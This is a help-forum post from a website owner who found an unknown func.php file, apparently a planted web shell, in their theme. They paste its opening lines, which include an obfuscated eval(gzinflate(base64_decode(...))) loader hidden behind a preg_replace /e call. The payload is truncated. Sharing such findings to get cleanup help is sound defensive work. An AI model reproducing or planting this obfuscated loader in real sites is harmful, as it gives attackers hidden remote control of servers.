I stuck my head under the hood of my website because Feedburner suddenly stopped recognizing my feed. As I was going through my php files to clean out the white space, I found an unfamiliar file: func.php
The code is enormous but here’s how it started:
<?php $auth_pass = "8a4bf282852bf4c49e17f0951f645e72"; $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251"; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAl
I deleted the file but am still researching to see if anyone else has experienced this. I did notice the file seems to have been added on 8/31/11. My site has had numerous, sudden problems in the past week: feed stopped updating, extreme decrease in traffic, etc.
Anyway, I’m worried this hack has added files or code elsewhere on my site (I do not understand the code in the func.php file at all).
Has anyone seen this before? Any ideas about how to clean out any malicious code it has generated?
- The topic ‘I Think a Hack Added func.php to My Theme Files’ is closed to new replies.